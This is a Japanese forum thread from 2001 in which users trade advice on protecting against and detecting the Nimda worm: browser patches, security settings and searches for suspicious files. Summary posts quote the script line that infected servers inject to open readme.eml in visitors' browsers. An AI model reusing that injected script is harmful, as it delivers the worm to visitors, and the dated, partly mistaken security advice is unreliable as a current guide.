馬鹿が持ち上げてたぞ。

おいどっかのプルトニウムとか言うところのページに逝ったら
感染したよ　ノートンに検索させたらヒットした
IE6.0は駄目ダヨい

>>252
Windows Updateでそれが表示されていると言うことは、IEのインストール自体は
成功したと考えて良いでしょう。おそらくはなにか別のソフトウエアの
インストールに失敗したのでは？＞「（なんたらかんたら）へのアクセスはできませんでした」

>>254
デスクトップに新しくアイコンができてるはずだからクリックしてみて。
「Windows Update セットアップの再開」　だったかな？

>>252
IEのヘルプ→バージョン情報みてみそ。

>>254
それは単にIEのキャッシュにヒットしただけでは？
実行しなければ感染はしないよ。Nortonだと実行前に警告が上がってきて、
そこで「アクセス拒否」（だったかな？）を押せば実行しなくて済むはず。

IEアップデートできません。
「タスクスケジューラの署名を確認しています」のところで、
DL失敗になります。何回やっても同じです。
何故でしょう？

うちには毎週日曜に必ずウィルスが送られてくるよ
まじで相手を殺してー

ザ・ワイドでやるぞ

>255さん
レスありがとうございます。
とりあえずＰＳ２はうまくいってるのですね。安心しました。
本当に本当に本当にどうもありがとうございます。

今日１番にアクセスしたのが２ｃｈでよかったです。
いつもいくどの板のトップにも緊急のお知らせがあったし、
この板と、特にこのスレの皆さんには感謝しています。
本当にありがとう。

>>259
IE自体がアップデートできていれば*今回のウイルスについては*問題ないはず。
ヘルプ→バージョン情報で "5.50.4807.2300" になっていればOK。

IE6.0はホントにだめなのでしょうか？

>257さん
ありがとうございます。
見てみます。

>>254
　インターネットオプションの全般にある一時ファイル空にしてもう一回
スキャンしてみて。
　よければその結果も教えて

>>255
IE UPDATE が途中で止まると、「（なんたらかんたら）へのアクセスはできませんでした」 って
でないっけ？

まぁその場合にはデスクトップに「Windows Update セットアップの再開」　っていうアイコンが
できるんだけども。

>>264
手元で試しているが問題ない。ただ、IEのバージョンが何であれ
感染したサイトに行くと「ダウンロードしますか？」が出てくるので
キャンセルすると良い。ちなみにこれはIEでなくてmozillaでもNetscape
でも出る。

IEの未対応バージョンだと「ダウンロードしますか？」が出ないでいきなり
実行してしまうので問題ってこと。

>257さん
「更新バージョン：；ＳＰ２；」となっていました。
大丈夫そうです。ほっとしました。
親切にありがとうございました。
本当に親切な皆さん、ありがとうございます。

>>268
ありがとう！

既に感染していたらアップデートしても
意味ないからね。
　ちゃんと感染の有無は確認してね＞初心者ALL

>>263
いえ、セットアップの再開になってしまうんです。
何度やってもダメです。

http://www.orico.co.jp/

IE6.0でセキュリティ関係全部ONだと感染するよ
というか感染した
鬱だ　氏脳

じゃあやっぱり
IE5.5のほうがいいのでしょうか？

>>271
どうやって感染を確かめるのでしょうか？
教えてくださいまし。

>>274
　そりゃ、無条件で全てを受け入れるってことだから
感染するよ。
　DLとかactiveXとかのやばい物は表を歩く時でも
ダイアログ出すようにしないと

>>274
マジ？
それは新情報だよ？

>272
Windows Update はアンチウィルスソフトを無効にしとかないと失敗することがあるよ

参考になった。良スレであった。

過去レス見たのでわかりました。
感染してませんでした。

IE6入れちったよ

Windows Updateに繋ぐときは「Javaの許可」で「安全性-高」にしてたら
正常に表示されないことがある。「安全性-低」に設定すると大丈夫。

現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
　MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル（README.EXE）を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル（README.EXE）を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル（README.EXE）を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。

W32ﾆﾀﾞ

JavaScriptの切り方教えて下さい｡

http://www.chunichi.co.jp/
対策方法はここを見れば全てわかる

＞287は感染サイト！！！

叩かないように！

>286
243を見れ

930 ：　 ：01/09/19 15:58 ID:AmEHqk4c
>>923
　やじるし通りに手順を踏んで、そこにラジオ(チェックボックスみたいの)がいっぱいあるから
そこで『java』って書いてある全部と、『ダウンロード』『ファイルのダウンロード』って項目を
全部不許可。
　事態が収束したら、セキュリティー中でOKだからとりあえず今はこうしといて。

OutlookExpressで、メールおくったことあるのに、
emlファイルが全くないのは大丈夫なの？

>感染鯖
>　ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
>"resizable=no,top=6000,left=6000")</script></html>
>が追加される。

JavaScript(JScript)で実行されてるのに
JAVAの設定切って意味あんの？

だめだー、IEアップデートしたくてもできない
ダイヤルアップだから途中で回線が切れてしまう

とりあえずネットスケープ使ってるけどそれで大丈夫でしょうか？

ウィルス流通の温床と化してるアウトルック（エクスプレス）、何度も
散々痛い目見てるのに何故に使いつづけるかね…。ヴァカか？

IE5.01SP2だけど念の為、と思って、HDを「readme.exe」で検索してみたら・・・
「w32_nimda」とかそのまんまのファイル名とかが５〜６個出てきた！！


・・・でも良く見たらさっき見たサイトのTemporary Internet Filesだった。

>>291
emlはメール単体（1通分）のファイルです。
Outlook Expressでは、その中でメールをやり取りしているだけではmbxかdbxの
拡張子を持ったファイルに複数個のメールがいっしょに入ります。

従って、Outlook Expressでメール送受信をしているだけならemlは出てきません。

MEでIE5.5なんですが、どうしたらいいの

現時点で感染してなくてIEをSP2にアップしてJAVAとか切ったらもう安全？
実行ファイルを押さない限り安全？

>>294
おすすめのメーラーってなに？
Netscape Mail 以外で。

>>292
　いやさ、元々初心者用に書いたから、
JAVAとjavaの違い説明するの面倒だったのよ。
　しゃーねーなって流しといて（w

>>298
javascriptを切っておけば今回の問題についてはとりあえず安全。
あと、知らないファイルについて「ダウンロードしますか？」と聞かれた場合は
素直に「キャンセル」を押しましょう。

http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

>>300
>JAVAとjavaの違い

お前もわかってねーだろ。

重くてやってらんねぇ
本屋行ってくる

>>294
わざわざ入れんのめんどくせえ。
Outlook Expressアンインストールできないし。

ＩＥ5.0なんですけど下のどれを入れたほうが良いと思います

Internet Explorer 5.5 Service Pack 2 とインターネット ツール

Internet Explorer 5.01 Service Pack 2

どこで検索すればいいのかわかりません！
検索ってアウトルックで検索？

>301
ｻﾝｸｽｺ。あとは自己防衛でだいじょぶなんだね。
JAVAとかは普段から全部切ってるから安心だよ。
アクティブスクリプトを切るとバナー広告とかもでてこなくなるから便利だよな。

>293
IEのツール(T)→インターネットオプションから、

「接続」タブ
→「設定」ボタン
→「ダイヤルアップの設定」の「プロパティ」
→「ダイヤル」タブ
→「アイドル時の切断」チェックを外す

これで回線は途中で切れないようになります。
デフォルトでは「20分たったら切断」となってるので
これが原因かと。

違ってたらｽﾏｿ。

>>299
Becky!InternetMail
シェアウェア4000円とちと高いけど、複数アカウントでも使いやすい。

NetscapeMailは以前使ってたけど、複数のアカウントがまともに扱えなかったからねぇ。

>307
Windowsのメニューから検索→ファイルやフォルダを選んで探したいものを入力する

>>307
スタートメニューの「検索」→「ファイルやフォルダ」

アクティブXは有効でもいいんですか？

ネスケで良かった。ベキーで良かった。

IE5.01SP2だと駄目なの？
IE5.5SP2かIE6にしなきゃ駄目ってこと？

マックでよかったヽ(´ー｀)ノ

>313
ActiveXのチェックボタンは、全て「無効」または
「ダイアログ表示」に設定しておくのがよろしい。

　　　　　＿＿＿＿＿
　　　 ／＿　　　　　　|
　 　 /.　＼￣￣￣￣|
　　/　　／　 ―　― |
　　|　 /　　 　-　　- |
　 ||| (6　　　　　　>　|
　| | |　　　　 ┏━┓|　　 ／￣￣￣￣￣￣￣￣
| | | | 　　　　┃─┃|　 ＜　正直、どんな被害が予想されるの？恐い・・・
|| | | | 　＼　┃　 ┃/　 　 ＼＿＿＿＿＿＿＿＿
| || |　|　　　￣　￣|

>>310
ありがと。
移行してもいいんだけど、一番気になるのは、Outlookで大量にたまった
過去メールもちゃんと移行できるかってことなんだよね。

以前もフリーソフトなんかをつかって移行をこころみたけど、結局うまく
いかなくて諦めた。

林檎って楽だなーーーーー。
これを機会に林檎使いが増え・・る訳ないか・・。

ネスケメール、今では複数のアカウントに対応してるぜ。

X68000でよかったヽ(´ー｀)ノ

303
javascript＝Netscapeが考えたHTML埋め込み型script言語
　元々はLiveScript。
JAVA＝Sun Microsystemsが作ったJAVA言語

　で確かあってるはずだが……

JAVAを無効にするにはどうしたらいいの？

友人から対策でこれ入れろってメール来たが、これって今回とは関係ないパッチだよな？効果あんのか…誰か教えてくれー。
http://www.microsoft.com/japan/technet/security/SecFaq.asp?sec_cd=ms01-020

>>319
できるよ。詳しくはここ見てちょ
http://www.becky-users.net/faq/contents/01003.html

うーん、よく分からん。

>>325
ここを見ると良いぞ。今回の件限定だけど。
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

>>321
できるにはできるんだけど、いちいち別のプロファイルで再起動せねばならないのでは
使い物にならんということで…。

Becky!みたく一元的に複数アカウントの管理ができないとどうもね…。

ようはIE5以上のSP2にして、readme.*みたいなファイルは
知らんぷりすれってこと？

Service Pack　２をインストール
ってどうやってするんですか？

http://www.ygu.ac.jp/guide/hougakuseiji/index.html
対策ソフト配布開始した模様

>>330
そういうことです。今回の件に限ったことではないですが、少しでも「怪しい」と
思ったファイルは開かないのが吉です。IE5でSP2未満だと「開くか開かないか」
さえ聞いてこないのでこのスレで問題になっているのですが。

>>326
ありがと。
mboxに直してくれるんだ。安心安心。
ちょっと試してみよ。

>>333
怪しいと思わずにうっかり開いたらどうなるんですか？

>>328
うーん、なんか良くわからんが、HTMLメールに仕込まれてた場合はこれで回避できるって事？

>>335
あぼーんです。

>>335
ウイルスチェックのソフトウエアが入っていて、かつ最新のパターンファイルに
なっていればウイルスチェックのソフトウエアで防御できる。
ただしウイルスチェック側で「開こうとしたファイル全てに対してウイルスを
チェックする」設定にしておかないと意味無し。

そうでない場合は感染する。

SP2ダウンロードしてるんだけど
残り時間１５時間１２分、、、マジっすか？

>>339
みんな一斉にダウンロードしようとしてるから遅いんだと思う。

IE5.0なんですけど、IE5.01のＳＰ２っていうのを
ＤＬしてもいいんでしょうか？

IE5.5SP一分ぐらいで落とせたんですけど、これでいいんですか？

昨夜、調べ物してたら、QuickTimeの「〇〇を実行するには〇〇のプログラム
をDLしないといけません。ダウンロードしますか？」と出たので、しないを
押したらブラウザが強制終了。
その後も別のサイトでそのダイアログ？が立ち上がったので、しつこいなぁと
思いつつ落としたのだが、その後またもやIEが強制終了。
今まで、QuickTime関連のダイアログなんか起動したことがなかったので変な感じ。

まさかなぁとは思うのだが…。
自宅はWin2000でIE5.5SP1…ヤバイ…ヤバすぎ。
コードレッド対策のときに、コードレッド用のセキュリティホールのパッチは
あてたのだが…意味無し？

どうしよ…早く家に帰りたい…。

漏れいまだにＩＥ4.0

俺IE6.0テスト版なんだけどテスト版でも大丈夫なんかいな？

>>329
それがネスケ６（あれ、６．１だっけ？）からは同一プロファイルで
複数のアカウントに対応できるようになってんだな。
ちょっと感動した。

>>339，>>341

とりあえず、JavaScriptを切れば大丈夫だって。
JavaScriptの切り方は過去レス参照してね。

混んでるさなか、急いでＤＬする必要はない。
落ち着く事が第一です。

>>345
何があるか解らない（無保証なのがテスト版）ので、念のためIE6正式版をインストールすると良い。

雑誌の付録で付いてるかな？

5.5のカスタマイズ版って書いてあるんだけど・・・
SP2ってどこでどうやって手に入れるの

>>349
IE6は難しいが、5.5SP2なら探せばあるはず。

あ、SP2です。

しかし今さらながら
なんでこんなことをするんだろうなぁ…

>>347
ありがとう。

>>339
今、パソコン３台にIE５．５SP２をDLしたけどISDNで１台５０分
くらいだったよ

>>351
ありがとう、探してみます。

ＳＰ２で
「ダウンロードしますか？」ダイアログを
キャンセルしても、
しっかりreadme.exe、readme.emlが出来ているはず。
削除々々！

俺のPCのウイルススキャン用ソフト
McAfee VirusScan Schedular 4.0.3a
めちゃくちゃ古くないか？・・・鬱だ。

柳条湖事件70周年

http://people.site.ne.jp/HTTP_REFERER/index.html

http://www.igosoft.co.jp/html/update/jpow2up.html
5.5SP2ならここ

>>340
そうですね、サイトがビジーのようでダウンロード中断されちゃいました。

>>347
ありがとうございます。
Javaは切ってるから大丈夫なんですけどちょっと気になったものですから、、、
この騒動が落ち着いた頃にﾏﾀｰﾘダウンロードすることにします。

>>360
ちゃんとMicrosoftからダウンロードしましょう。

# つーか、感染してるサイトっぽいな・・
# こっちからだとコネクションが確立できないので未確認だが。

>>357
どこに出来ているんですか？

>344
俺も。
どうするよ。

ＩＥ５.０１ＳＰ２とＩＥ５.５ＳＰ２って何が違うんですか？

>>363
"Temporary Internet Files" の中だと思う。
感染サイトにアクセスすると例外なく作られてしまうが、実行しなければ感染しない。

結局感染しても再セットアップすればいいのですか？

よく分からない初心者は今すぐPCの電源切って寝てて下さい。

*.eml じゃなくて*.logのファイルがたくさんでているんだけど。これ
確実にウイルスだよね？

ウィルスに感染していた場合
パソコン初期化すれば元に戻りますか？

>>358
漏れのは3.1.0Fだが、何か？

今、ダウンロード中。
ADSLにしといて良かったと、初めて思った。

つい最近IE4.0から5.5に変えたが、心配かな？
雑誌のCDからインストルしたんだが。

w32.nimda.a@mm[1].htm
こんなファイルあったからちょっとﾋﾞｯｸﾘした。
単なるシマンテックのキャッシュか。

http://windowsupdate.microsoft.com/
ここがさっきと違うんですけど
なんで

>>370
感染してしまったら素直にフォーマットして再インストールするのが間違いないでしょう。
あと、少し待てば駆除ツールがどこかで公開されるかもしれないので、急がない人は
そういう方法でも大丈夫でしょう。

ただし、必要なファイルをバックアップする場合は、そのファイルが感染していないか
どうかを必ず確認しましょう。

状況報告ver1.05(前編)
感染前対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
　→java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav（音声）ファイルになりすます。

LANによる感染
　社内に一人でも対策してないひとがいてノーパスとかにしていた場合
　LANの共有フォルダを使っても自己増殖する。

感染鯖
　ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。

極初心者なのは仕様が無いとしても、
過去ﾚｽくらい読みましょうよ.ﾏｼﾞで.　ﾈ(困.

漏れは産毛の生えかけた初心者だけど、
500ﾚｽまでくらいならｷﾁﾘと読めるﾓﾝな(苦.

状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　といっても後者二つを消したからウイルスが消えるわけではない。
　ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
　感染してしまった後は、アップデートしても無意味。
　とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。

　感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

　ワクチンできたよとかの情報など、追加のフォローさらに宜しく！＞ALL

>>342
どこでやったの？

>>342
ダウンロードする為のプログラムっぽいな。

今ie5.5なんだけどie6.0にアップデートするときって
一度ie5.5はアンインストールせねばならんの？

ひまー　

>>375　今回のウィルス対策のjava設定するとWINDOWS UPDATEがみれないね。

＞３７６
レスありがとうございます

>>382
そんなことないよ。

>>382
そのままインストールできます。

>>342
ie5setup.exeならただの起動ファイルだと思う
実行したらインストールしてあるコンポーネントに応じて
必要なファイルをダウンロードしてくるはず

http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
のリストの中の一つに良く言ってたんだが感染してないようだ。

ってアリ？

IE5.5sp2一時間以上かかるんですが、これでいいの

>>390
皆ダウンロードを始めているので遅いです。

>>384
そうでした。かなしー超初心者です・・・

>>390
１時間くらいかかると思います

検索してみたら、『readme.exe』だけが見つかったんだけど、
これって感染してるんでしょうか？
今のところ、感染の症状らしきものは何もないんですが。

３０分ぐらいになってました。表示では一時間以上だったんだけど

こっちに書き込んでるとやっぱダウンロードも遅くなるんでしょうか

午後１２時くらいは、もっとスカスカだったのにな
こんなになるとは

「これって感染してるの？」と聞く前に
冷静に過去ログを読みなさい。

俺も「IE５．５SP２」ダウンロードしようと思ったんだけど、やっぱり
メチャ時間掛かるんだね、途中でやめちゃったよ。
電話代もったいなくても更新すべきか？

ここを読んで、早速IE5.0をダウンロードしました。
でも不安になってさらにIE6.0にバージョンアップしたんだけど、
すっごい時間がかかっちゃた・・・。
今更ながらですけど、IE6.0のメディアってかっこいいですね！

>>396
そんなに変わりはない・・はず。
回線によるかモナー

>>394
"Temporary Internet Files" にあるだけで、そこの中でクリックして
実行していなければ問題ないはず。でも念のためウイルススキャンはしておくように。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662&st=377&to=379&nofirst=true

自分のブラウザのバージョンを知るには何処を見ればいいの？

>>387-388
ありがとう

今、発売中のパソコン雑誌の付録の
IE5.5いれても、ダメですよ。
マイクロソフトまで、取りに行きましょう。

>>243 さん
IP4 SP2のユーザーです。私もこんなことでバージョンを更新したくないと
思っていたところでしたので、ご教示助かりました。さっそくscriptを無効
にして、ちょっと安心しています。

２ちゃんねるのニュース速報版もニューヨーカーみたいに、危機に際しては
親切な人が出てくるんですね。感謝です。

>>403
「ヘルプ」→「バージョン情報」

ヘルプの所のバージョン情報>>403

かぶっちゃったヽ( ´ー`)ノ

>>358
>McAfee VirusScan Schedular 4.0.3a
少し古いけど、これは、エンジン部分のバージョンだから、
むしろ、定義ファイルのバージョン（日付）の方が重要です。

＞402
どうもありがとうございます。
ウイルススキャンやってみます。

でもJavaオフにするとMSのサイトとか見れねえんだよな。
クソめんどくせえ。

>>299
おれはDatula使ってる。Beckyより安い2980円。
複数アカウントも使いやすい。
http://www.onsystems.co.jp/

関係無いのだが、ブラウザうｐデートしたらMXの調子がおかしくなった。

ここもwhile(1){} か・・・
鬱だ、氏のう・・・

国連関連のＷＥＢにウィルスがあったので通報したらすぐにサーバーを止めたとの
返事が帰ってきた。世界は俺の手で救われた。（￣ー￣）ﾆﾔﾘ

２ちゃんねる自体から感染することはある？あと感染してたら2ch見るの控えた方がいいんだろうか

http://www.zdnet.co.jp/news/0108/16/b_0815_02.html?1108011011
Microsoftの「Internet Explorer（IE）5.5」にサービスパック2（SP2）を
インストー ルした場合と，IE 6のベータ版を使用した場合に，
QuickTimeムービーが再生できな いという問題が発生している。
原因はプラグインにあるものと見られている。

これって解決してるの？

なんとなくIEの上位バージョンをﾀﾞｳｿしてみた。
みんな同じことやってるみたいだな・・・LANなのに異様に重い・・・

http://www.trendmicro.co.jp/hcall/scan.htm
↑
これってどうやって使うの？

IE6にしました。
そしたら、2chの移動された板が文字化けします。
文字化けする人はこちらって所に行くと最初の画面は見れるんですが
過去ログが文字化けで見れません。
どうしよう・・・。

>>418
http://www.apple.co.jp/quicktime/download/index.html
からダウンロードすると良いのでは。

IE5.5 SP2　まだ？(･ε･)
http://yasai.2ch.net/test/read.cgi?bbs=win&key=994745381


IE5.5 SP2バグ多くて不安定らしい
しかしIE6.0は今だ正式版ではないし・・・
こまったね

◆コード・レッド上回る感染力の新ウイルス、FBIが警告

米連邦捜査局（ＦＢＩ）は18日、極めて感染力が強い新種のコンピュ
ーター・ウイルス「Ｗ３２ＮＩＭＤＡ」が広まりつつあるとして注意
を呼び掛けた。7月にインターネットの情報の流れを滞らせ、ホワイト
ハウスのサーバーを攻撃した「コード・レッド」よりも広範囲に被害
をもたらす可能性があるという。
ウイルスは「Admin（政府）２（to）３Ｗ（War）」、つまり「第三次
世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。
このため、先週の同時テロとの関係を指摘する声もあるが、アシュク
ロフト司法長官は記者会見で、「ウイルス感染と同時テロとを結びつ
ける証拠は現時点では得ていない」と述べた。
ウイルスは昨日から電子メールの添付ファイルとともに急速に広がり
出し、サーバーやパソコンへの感染は数万件に達している模様だ。
「README.EXE」の名前が付いた電子メールのファイルを開いて感染
した例が報告されている。（ワシントン＝安藤淳）

>>420
そのまま「ウイルスバスター On-Line Scan」をクリックすると良い。
あとはウイルスチェック用のActiveXコントロールがダウンロードされるので、
それを受け入れればOK。ただし要IE（しかもActiveXをONにしなければならない）

>>423
IE6は正式版になりました。
http://www.microsoft.com/japan/ie/

>>413
ありがと。
BeckyにしろDatulaにしろmboxに変換しちゃえば何とか過去メールの
移行はできそうですね。

悩ましい。

>>418
Apple USのサイトにQT用のActiveX Controlがうぷされてるよ

IEやめてNetscape4.78にしる〜

>>418
Apple USのサイトにQT用のActiveX Controlがうぷされてるよ

>>428
せめてmozillaかnetscape6にしてくれ・・・

>>423
家６.０既に出てると思われ

おいおい！石原慎太郎を訴えたキティ市民団体のニュースを調べたら、
こんなの見つけたよ・・・

【速報】文部科学省地震調査研究推進本部のホームページにも新種ウイルス「Ｎｉｍｄａ（ニムダ）」が感染
http://www.jiji.com/cgi-bin/contents.cgi?content=2001091910818&genre=soc

IE6にうpデートしたら2chが文字化けして見れないよ〜
誰かなおす方法教えて〜〜〜〜〜！

IE5.5SP2をダウンロードしたら、デスクトップに
インターネットに接続っていうアイコンが新しくできたよ
これ削除してもいいよね？

>>417
過去ログにもあるが、2ちゃんねるはＭＳのサーバ使ってない（apache)らしいから、
2ちゃん自体から感染することはないです。
もちろん張ってあるＵＲＬ安易につついたら、話はべつだけど。

でたよ Ie6！ 〜バージョン３〜
http://yasai.2ch.net/test/read.cgi?bbs=win&key=1000671972

こっちもあまし評判芳しくないね

IEを起動するとインターネット接続ウイザードが表示されるので、
それを進めていけば自動的に消えるはず。

今晩あたり中村正三郎が
http://www.asahi-net.or.jp/~ki4s-nkmr/index.html
に「今だにIE使ってる馬鹿がいるんですね。当然の報いですね。自業自得ですね」
と書いてくれることだろう。

密かな疑問なんですけど･･･
暗号強度１２８-BITって具体的にどこを強化しているの？

勝手にお気に入りのとこに、MSNがはいってるねんけど
なんで？

>>439
httpsで始まるWebサイトを見たときに、128ビットの暗号鍵が使えるようになる。

>>437
それは＞４３４へのお答え？
私も消えないんだけど･･･IEを起動してもそんなウィザード出ないよぉ。

検索したら９／１９作成でreadme[1]　種類Outlook Expressメールメッセージ、
があって、開くとアウトルックが起動してダウンロードするか聞いてくる・・・。

例のやつ？　削除すればいい？

>>438
ってことは、こいつの仕業か？

>>439
ＳＳＬで情報送信するときでしょう。
他になにかあったかな？

あのさ、ダウンロードがめんどくさかったら、しばらく一時的にでも
ネスケ使えば？雑誌とかについてる付録ですぐインストールできるし。

>>430
だってnetscape6は不安定過ぎ。今のところは4.78が賢明と思う。
netscapeだって6に自信ないから4.75→4.78のヴァージョンアップしたんでしょ?

>>442
済まぬポインタ指定してなかった・・
アイコンについては特に必要性はないので消してOKです。

ＩＥ６にして、２ｃｈ文字化け・コピペも出来ない。
誰か助けてください〜！

>>441-445
レスありがとです〜
とりあえずこれで安心なんでしょうかね？
これから自己防衛だけでも勉強してみます。

IE6のクッキーの設定はどうすればいいのか？

>>447
それならmozillaで良いのでは。0.9.3くらいからいなり安定して動くよ。
netscapeみたいに謎のソフトウエアも入らないし(藁

今ニュースで言ってたけど、農水省も感染だって

>ウイルスは「Admin（政府）２（to）３Ｗ（War）」、つまり「第三次
>世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。

これ、日経の記事だろ。日経の記者、頭わるー。

>>451
「プライバシー」のタブにある。

メーラはAL-mailがいいと思うんだが
本筋には全く関係ない

今アクセスしたら１８通もメール来ててびっくりしたよ。
ほとんどワームだった（鬱）

ネスケ6.1になってﾁｮﾄまともになった。

ねえ……
これって冗談抜きで、サイバーテロの始まりじゃないの？
どんどんすごいのがでてきたりして……。

近畿掲示板見ようとしたら、「新しいファイルをダウンロードしてくれ」
って出てんけど、どうゆう事???

>460
やられたね。

＞14
＞の2：Cドライブがネットワーク共有を勝手にされていたら感染している

共有されているかはどうやって確認するんですか？
ガイシュツだったらごめんなさい。

>>461
マジですか・・・・？

サーカムのときもそうだったが、今回も感染メールこないねえ。
まあ、プロバイダのウイルスチェックが働いている証拠なんだろうけど。

ネスケの4.75→4.78のアップデートは必要なんでしょうか？

http://home.netscape.com/download/sd_cc32d478ja.html
の一番下の
Download without SmartDownload の所にある
click hereをクリックするのだ。
とりあえず2ちゃんねるは見られるようになるだろう。

SP2をダウンロードできないよ〜
再開してもブチブチ切られるコンチクショウ。

>>462
エクスプローラを開いてC:ドライブを選び、右ボタンから「プロパティ」。
ただし、Windows NT/2000の場合はOS標準の振る舞いで"C$"という名称で
共有がかかっているが、これについては問題はないので注意。
また、Windows NT/2000の場合はAdministratorsグループに所属しているとか
管理権限が必要なので注意。

>>452
ありがとう
試してみるよ

IE5.5 SP2が欲しいって奴は近所の電気屋とかに走って
DIONの販促用のCD-ROMもらってこい
あれに入ってるぞ

>>460です。
ほんとにヤバイんでしょうか？

>>456
ありがと。
結局使いこんでるメーラーが一番使いやすいってことかな？

確かに本筋から外れてるので、あとは自分でいろいろ調べてみます。

＼　ｳｲﾙｽに警戒せよ　　　／
　 ＼　ｳｲﾙｽに警戒せよ／
　　ΛΛ　　ΛΛ　　.ΛΛ
　 （,,ﾟДﾟ）　(,,ﾟДﾟ）　（,,ﾟДﾟ）
　 （|　|：|） （|　|：|）　（,|　l：|）
　　.|__|：|　　|__|：|, 　　|__|：|
　　 |__|_|.　　|__|_|　　　|__|_|
　　 ∪U　　 Ｕ∪　　　ＵＵ

>>460 = >>471
どこのことを言ってるのかもわからないし、
どういう状況なのかもわからない。
これじゃ何も言いようがない。

ファイル検索したらreadme.exeファイルがあったんですけど、更新日時が
９７年だったんですか、これって感染してるんですか？

252で、ＰＳ２へのバージョンアップについて皆さんに教えていただいた者です。
その後、このスレで教えてくださっているウィルスに感染してないかどうかの
チェックもしました。（本当は順番逆ですか？すみません。混んでいて？入れず
やっと終わりました）感染はしていませんでした。安心しました。
しつこいようですが、個別の質問に答えてくださった方、まとめを何度も書いてくださった方、
親切な皆さん、本当にありがとうございました。
引き続き冷静にこのスレで勉強させていただきます。
他の初心者の皆さんも落ち着いて頑張ってくださいね。

>>475
身に覚えのないファイルなら削除しましょう。
削除して再チェック。

ああーー！
IE６インストールしたら、何かエラーらしくて、ﾈｯﾄ使えなくなったよ。
ﾒｰﾙと、ｶﾁｭｰｼｬで２ｃｈはできるけど、他ができん！
ちくしょう。

情けない質問ですみません。
ＩＥをアップデートしたら「д」等の記号が太線で表示されるようになってしまったんですが
どこで直せるんでしょうか？

>>477
ありがとうございます。
トレンドマイクロのオンラインチェックで感染ファイルがなければOKなんですよね？

Autoプロテクトにもしてるし、スキャンも問題無かったのに、
私だけ開けないサイトがいくつかあるようです（例えば郵政省のＨＰ）
これは私が感染してるんでしょうか？ウィルス定義の更新もちゃんとしてます。
ただまだＩＥ５．５のＳＰ１ですけど。他板でリンク張ったらみんな軽く開いた・・・。

>４６８
レスありがとうございます。
見たら空き容量が何十バイトかとクリーンアップボタンがあるんですが、
これなら大丈夫なんですよね？
というか、共有されていたらどう表示されるんですか?

>>478
詳しいエラー内容を書いてくだされ・・

ネスケ
http://home.netscape.com/ja/

皆さんやさしいですね・・・
茶化す人もいないし・・
２ちゃんねらー見直した。

>>480
ほぼ問題ないと考えて良いでしょう。が、これからも注意は怠らないようにしましょう。

>>482
共有されていたらドライブのアイコンに「手で持ち上げているようなアイコン」が表示されるはず。
Windows NT/2000だとデフォルトの振る舞い(>>468)があるので、それとは区別しましょう。
それ以外の場合はそのアイコンがあればさっさと解除しましょう。

また、そもそもプロパティ内に「共有」がなければ特に問題はありません。
念のためウイルスチェックは忘れずに。

>>481
http://www.yusei.go.jp/　ならScriptも使ってないし、普通に見れるが。

簡単だからこれ使ってるけど、とりあえずの対策としては大丈夫？
詳しい人教えてください。
http://www.python.f2s.com/brain/tool/tool1.html

>>485
普段煽ったり荒らしたりしてるのは経験の少ない人間と思われ。
誰かがどっかのスレで書いてたけど、
経験と態度の大きさは反比例するって。

IE6入れたけど、今のところ問題ないようだ。

>>489
それは思いっきり人によると思われる。
ｱｱｽﾚﾁｶﾞｲ

>>489
名前間違えた。逝ってくる。

>>488
恐らく大丈夫。とはいえ誰も保証してくれないので注意。

>>483
あ、これはお気遣いありがとうございます。
でもそれも判らないんですよね。
最近全体的に不安定だったんで、
